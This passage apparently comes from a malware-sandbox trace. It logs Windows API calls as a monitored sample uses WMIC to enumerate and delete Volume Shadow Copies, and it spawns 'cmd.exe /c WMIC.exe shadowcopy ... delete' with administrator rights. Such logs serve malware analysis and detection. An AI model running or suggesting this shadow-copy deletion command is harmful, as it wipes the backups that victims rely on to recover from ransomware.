WHERE ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'") returned 0x50 [0102.050] SysStringLen (param_1="") returned 0x0 [0102.050] free (_Block=0x49cce0) [0102.050] malloc (_Size=0x18) returned 0x49cce0 [0102.050] IWbemServices:ExecQuery (in: This=0x1d83c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'", lFlags=0, pCtx=0x0, ppEnum=0x18fa08 | out: ppEnum=0x18fa08*=0x1d83d18) returned 0x0 [0102.101] free (_Block=0x49cce0) [0102.101] CoSetProxyBlanket (pProxy=0x1d83d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0102.103] IEnumWbemClassObject:Next (in: This=0x1d83d18, lTimeout=-1, uCount=0x1, apObjects=0x18fa10, puReturned=0x18fa20 | out: apObjects=0x18fa10*=0x1d83d80, puReturned=0x18fa20*=0x1) returned 0x0 [0102.104] malloc (_Size=0x18) returned 0x49cce0 [0102.104] IWbemClassObject:Get (in: This=0x1d83d80, wszName="__PATH", lFlags=0, pVal=0x18fa30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18fa30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.104] free (_Block=0x49cce0) [0102.104] malloc (_Size=0x800) returned 0x49d080 [0102.104] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x49d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0102.104] FormatMessageW (in: dwFlags=0x2500, lpSource=0x49d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x18f958, nSize=0x0, Arguments=0x18f968 | out: lpBuffer="뚐#") returned 0x67 [0102.105] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0102.105] malloc (_Size=0x68) returned 0x49d890 [0102.105] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x49d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0102.105] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff832ab0 [0102.105] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0102.105] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0102.105] free (_Block=0x49d890) [0102.105] free (_Block=0x49d080) [0102.105] LocalFree (hMem=0x23b690) returned 0x0 [0102.105] IWbemServices:DeleteInstance (in: This=0x1d83c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0103.338] IUnknown:Release (This=0x1d83d80) returned 0x0 [0103.338] malloc (_Size=0x800) returned 0x49d080 [0103.338] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x49d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0103.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.338] malloc (_Size=0x20) returned 0x49cef0 [0103.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x49cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0103.338] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff832ab0 [0103.338] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0103.339] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0103.339] free (_Block=0x49cef0) [0103.339] free (_Block=0x49d080) [0103.339] IEnumWbemClassObject:Next (in: This=0x1d83d18, lTimeout=-1, uCount=0x1, apObjects=0x18fa10, puReturned=0x18fa20 | out: apObjects=0x18fa10*=0x0, puReturned=0x18fa20*=0x0) returned 0x1 [0103.341] IUnknown:Release (This=0x1d83d18) returned 0x0 [0103.342] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.342] free (_Block=0x49cca0) [0103.342] free (_Block=0x49ccc0) [0103.342] GetCurrentThreadId () returned 0x9c8 [0103.342] ??0CHString@@QEAA@PEBG@Z () returned 0x18fbe8 [0103.342] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x18fbe8 [0103.342] lstrlenW (lpString="LIST") returned 4 [0103.342] lstrlenW (lpString="delete") returned 6 [0103.343] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0103.343] lstrlenW (lpString="ASSOC") returned 5 [0103.343] lstrlenW (lpString="delete") returned 6 [0103.343] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0103.343] lstrlenW (lpString="GET") returned 3 [0103.343] lstrlenW (lpString="delete") returned 6 [0103.343] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0103.343] ??1CHString@@QEAA@XZ () returned 0x1ade3801 [0103.343] WbemLocator:IUnknown:Release (This=0x1d83c18) returned 0x0 [0103.343] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0103.343] _kbhit () returned 0x0 [0103.344] free (_Block=0x496f20) [0103.344] free (_Block=0x49cac0) [0103.344] free (_Block=0x49caa0) [0103.344] free (_Block=0x49ca80) [0103.344] free (_Block=0x49ca60) [0103.344] free (_Block=0x4970a0) [0103.344] free (_Block=0x49cb40) [0103.344] free (_Block=0x4985c0) [0103.344] free (_Block=0x49d020) [0103.344] free (_Block=0x49cbc0) [0103.344] free (_Block=0x49cfa0) [0103.344] free (_Block=0x49cae0) [0103.344] free (_Block=0x49cbe0) [0103.344] free (_Block=0x497140) [0103.345] free (_Block=0x496e00) [0103.345] free (_Block=0x49cff0) [0103.345] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0103.345] free (_Block=0x49ce20) [0103.345] free (_Block=0x49cb00) [0103.345] free (_Block=0x49cb20) [0103.345] free (_Block=0x49cf30) [0103.345] free (_Block=0x49cb60) [0103.345] free (_Block=0x497ee0) [0103.345] free (_Block=0x497f30) [0103.345] free (_Block=0x497f80) [0103.345] free (_Block=0x49cb80) [0103.345] free (_Block=0x496a20) [0103.345] free (_Block=0x496de0) [0103.345] free (_Block=0x498040) [0103.345] free (_Block=0x496dc0) [0103.345] free (_Block=0x498000) [0103.345] free (_Block=0x496d60) [0103.345] free (_Block=0x496d80) [0103.345] free (_Block=0x496c40) [0103.345] free (_Block=0x496c60) [0103.345] free (_Block=0x496be0) [0103.345] free (_Block=0x496c00) [0103.345] free (_Block=0x496ca0) [0103.346] free (_Block=0x496cc0) [0103.346] free (_Block=0x496d00) [0103.346] free (_Block=0x496d20) [0103.346] free (_Block=0x496b20) [0103.346] free (_Block=0x496b40) [0103.346] free (_Block=0x496ac0) [0103.346] free (_Block=0x496ae0) [0103.346] free (_Block=0x496b80) [0103.346] free (_Block=0x496ba0) [0103.346] free (_Block=0x496a60) [0103.346] free (_Block=0x496a80) [0103.346] free (_Block=0x4969d0) [0103.346] free (_Block=0x4969a0) [0103.346] free (_Block=0x496e90) [0103.346] WbemLocator:IUnknown:Release (This=0x1d71390) returned 0x2 [0103.346] WbemLocator:IUnknown:Release (This=0x1d83b28) returned 0x0 [0103.347] WbemLocator:IUnknown:Release (This=0x1d83a98) returned 0x0 [0103.347] WbemLocator:IUnknown:Release (This=0x1d71390) returned 0x1 [0103.347] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0103.347] WbemLocator:IUnknown:Release (This=0x1d71390) returned 0x0 [0103.347] free (_Block=0x49c9e0) [0103.347] free (_Block=0x49ca00) [0103.347] free (_Block=0x498540) [0103.347] free (_Block=0x49ca20) [0103.347] free (_Block=0x49ca40) [0103.347] free (_Block=0x498580) [0103.348] free (_Block=0x49c860) [0103.348] free (_Block=0x49c880) [0103.348] free (_Block=0x4983c0) [0103.348] free (_Block=0x49c8a0) [0103.348] free (_Block=0x49c8c0) [0103.348] free (_Block=0x498400) [0103.348] free (_Block=0x49c7e0) [0103.348] free (_Block=0x49c800) [0103.348] free (_Block=0x498340) [0103.348] free (_Block=0x49c820) [0103.348] free (_Block=0x49c840) [0103.348] free (_Block=0x498380) [0103.348] free (_Block=0x49c960) [0103.348] free (_Block=0x49c980) [0103.348] free (_Block=0x4984c0) [0103.348] free (_Block=0x49c9a0) [0103.348] free (_Block=0x49c9c0) [0103.348] free (_Block=0x498500) [0103.348] free (_Block=0x49c760) [0103.349] free (_Block=0x49c780) [0103.349] free (_Block=0x4982c0) [0103.349] free (_Block=0x49c7a0) [0103.349] free (_Block=0x49c7c0) [0103.349] free (_Block=0x498300) [0103.349] free (_Block=0x49c8e0) [0103.349] free (_Block=0x49c900) [0103.349] free (_Block=0x498440) [0103.349] free (_Block=0x49c920) [0103.349] free (_Block=0x49c940) [0103.349] free (_Block=0x498480) [0103.349] free (_Block=0x49c6a0) [0103.349] free (_Block=0x49c6c0) [0103.349] free (_Block=0x498200) [0103.349] free (_Block=0x49c560) [0103.349] free (_Block=0x49c580) [0103.349] free (_Block=0x4980c0) [0103.349] free (_Block=0x496e50) [0103.350] free (_Block=0x496e70) [0103.350] free (_Block=0x498080) [0103.350] free (_Block=0x49c5e0) [0103.350] free (_Block=0x49c600) [0103.350] free (_Block=0x498140) [0103.350] free (_Block=0x49c6e0) [0103.350] free (_Block=0x49c700) [0103.350] free (_Block=0x498240) [0103.350] free (_Block=0x49c5a0) [0103.350] free (_Block=0x49c5c0) [0103.350] free (_Block=0x498100) [0103.351] free (_Block=0x49c620) [0103.351] free (_Block=0x49c640) [0103.351] free (_Block=0x498180) [0103.351] free (_Block=0x49c660) [0103.351] free (_Block=0x49c680) [0103.351] free (_Block=0x4981c0) [0103.351] free (_Block=0x49c720) [0103.351] free (_Block=0x49c740) [0103.351] free (_Block=0x498280) [0103.351] CoUninitialize () [0103.376] exit (_Code=0) [0103.376] free (_Block=0x49cd30) [0103.376] free (_Block=0x497ea0) [0103.376] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.376] free (_Block=0x496f40) [0103.376] free (_Block=0x496a40) [0103.376] free (_Block=0x497e60) [0103.376] free (_Block=0x497e20) [0103.376] free (_Block=0x497dd0) [0103.376] free (_Block=0x497d90) [0103.376] free (_Block=0x497d30) [0103.376] free (_Block=0x495a90) [0103.376] free (_Block=0x495a50) [0103.376] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0103.376] free (_Block=0x49cec0) Thread: id = 173 os_tid = 0xab8 Thread: id = 174 os_tid = 0xae4 Thread: id = 175 os_tid = 0xb5c Thread: id = 176 os_tid = 0x3a4 Thread: id = 177 os_tid = 0xaa0 Process: id = "28" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x71703000" os_pid = "0x544" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 178 os_tid = 0x408 [0103.514] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fab0 | out: lpSystemTimeAsFileTime=0x18fab0*(dwLowDateTime=0x45476730, dwHighDateTime=0x1d68245)) [0103.514] GetCurrentProcessId () returned 0x544 [0103.514] GetCurrentThreadId () returned 0x408 [0103.514] GetTickCount () returned 0x114f8ff [0103.514] QueryPerformanceCounter (in: lpPerformanceCount=0x18fab8 | out: lpPerformanceCount=0x18fab8*=22340712543) returned 1 [0103.516] GetModuleHandleW (lpModuleName=0x0) returned 0x49d60000 [0103.516] __set_app_type (_Type=0x1) [0103.516] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49d87810) returned 0x0 [0103.517] __getmainargs (in: _Argc=0x49daa608, _Argv=0x49daa618, _Env=0x49daa610, _DoWildCard=0, _StartInfo=0x49d8e0f4 | out: _Argc=0x49daa608, _Argv=0x49daa618, _Env=0x49daa610) returned 0 [0103.517] GetCurrentThreadId () returned 0x408 [0103.517] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x408) returned 0x3c [0103.517] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0103.517] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0103.517] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0103.518] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.518] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fa48 | out: phkResult=0x18fa48*=0x0) returned 0x2 [0103.518] VirtualQuery (in: lpAddress=0x18fa30, lpBuffer=0x18f9b0, dwLength=0x30 | out: lpBuffer=0x18f9b0*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.518] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f9b0, dwLength=0x30 | out: lpBuffer=0x18f9b0*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.518] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f9b0, dwLength=0x30 | out: lpBuffer=0x18f9b0*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.518] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18f9b0, dwLength=0x30 | out: lpBuffer=0x18f9b0*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.518] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f9b0, dwLength=0x30 | out: lpBuffer=0x18f9b0*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0103.518] GetConsoleOutputCP () returned 0x1b5 [0103.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d9bfe0 | out: lpCPInfo=0x49d9bfe0) returned 1 [0103.519] SetConsoleCtrlHandler (HandlerRoutine=0x49d83184, Add=1) returned 1 [0103.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0103.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.519] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d8e194 | out: lpMode=0x49d8e194) returned 1 [0103.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.519] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d8e198 | out: lpMode=0x49d8e198) returned 1 [0103.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.520] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0103.520] GetEnvironmentStringsW () returned 0x288b90* [0103.520] GetProcessHeap () returned 0x270000 [0103.520] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa7c) returned 0x289620 [0103.520] FreeEnvironmentStringsW (penv=0x288b90) returned 1 [0103.520] GetProcessHeap () returned 0x270000 [0103.520] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8) returned 0x288a10 [0103.520] GetEnvironmentStringsW () returned 0x288b90* [0103.520] GetProcessHeap () returned 0x270000 [0103.520] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa7c) returned 0x28a0b0 [0103.521] FreeEnvironmentStringsW (penv=0x288b90) returned 1 [0103.521] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e908 | out: phkResult=0x18e908*=0x44) returned 0x0 [0103.521] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x0, lpData=0x18e920*=0x18, lpcbData=0x18e904*=0x1000) returned 0x2 [0103.521] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x4, lpData=0x18e920*=0x1, lpcbData=0x18e904*=0x4) returned 0x0 [0103.521] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x0, lpData=0x18e920*=0x1, lpcbData=0x18e904*=0x1000) returned 0x2 [0103.521] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x4, lpData=0x18e920*=0x0, lpcbData=0x18e904*=0x4) returned 0x0 [0103.521] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x4, lpData=0x18e920*=0x40, lpcbData=0x18e904*=0x4) returned 0x0 [0103.521] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x4, lpData=0x18e920*=0x40, lpcbData=0x18e904*=0x4) returned 0x0 [0103.521] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x0, lpData=0x18e920*=0x40, lpcbData=0x18e904*=0x1000) returned 0x2 [0103.521] RegCloseKey (hKey=0x44) returned 0x0 [0103.521] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e908 | out: phkResult=0x18e908*=0x44) returned 0x0 [0103.521] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x0, lpData=0x18e920*=0x40, lpcbData=0x18e904*=0x1000) returned 0x2 [0103.521] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x4, lpData=0x18e920*=0x1, lpcbData=0x18e904*=0x4) returned 0x0 [0103.522] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x0, lpData=0x18e920*=0x1, lpcbData=0x18e904*=0x1000) returned 0x2 [0103.522] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x4, lpData=0x18e920*=0x0, lpcbData=0x18e904*=0x4) returned 0x0 [0103.522] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x4, lpData=0x18e920*=0x9, lpcbData=0x18e904*=0x4) returned 0x0 [0103.522] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x4, lpData=0x18e920*=0x9, lpcbData=0x18e904*=0x4) returned 0x0 [0103.522] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e900, lpData=0x18e920, lpcbData=0x18e904*=0x1000 | out: lpType=0x18e900*=0x0, lpData=0x18e920*=0x9, lpcbData=0x18e904*=0x1000) returned 0x2 [0103.522] RegCloseKey (hKey=0x44) returned 0x0 [0103.522] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51744c [0103.522] srand (_Seed=0x5f51744c) [0103.522] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete" [0103.522] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete" [0103.522] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d9c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0103.522] GetProcessHeap () returned 0x270000 [0103.522] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x218) returned 0x28ab40 [0103.523] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0103.523] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d8f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0103.523] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d8f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0103.523] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d8f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0103.523] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0103.523] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0103.523] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0103.523] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0103.523] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0103.523] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0103.523] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0103.523] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0103.523] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0103.523] GetProcessHeap () returned 0x270000 [0103.523] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x289620 | out: hHeap=0x270000) returned 1 [0103.523] GetEnvironmentStringsW () returned 0x288b90* [0103.523] GetProcessHeap () returned 0x270000 [0103.523] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa94) returned 0x28ad60 [0103.524] FreeEnvironmentStringsW (penv=0x288b90) returned 1 [0103.524] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49d8f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.524] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49d8f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0103.524] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0103.524] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0103.524] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0103.524] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0103.524] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0103.524] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0103.524] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0103.524] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0103.524] GetProcessHeap () returned 0x270000 [0103.524] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x5c) returned 0x28b800 [0103.524] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f710 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0103.524] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18f710, lpFilePart=0x18f6f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f6f0*="Desktop") returned 0x25 [0103.524] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0103.524] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f420 | out: lpFindFileData=0x18f420*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x28b870 [0103.525] FindClose (in: hFindFile=0x28b870 | out: hFindFile=0x28b870) returned 1 [0103.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f420 | out: lpFindFileData=0x18f420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", 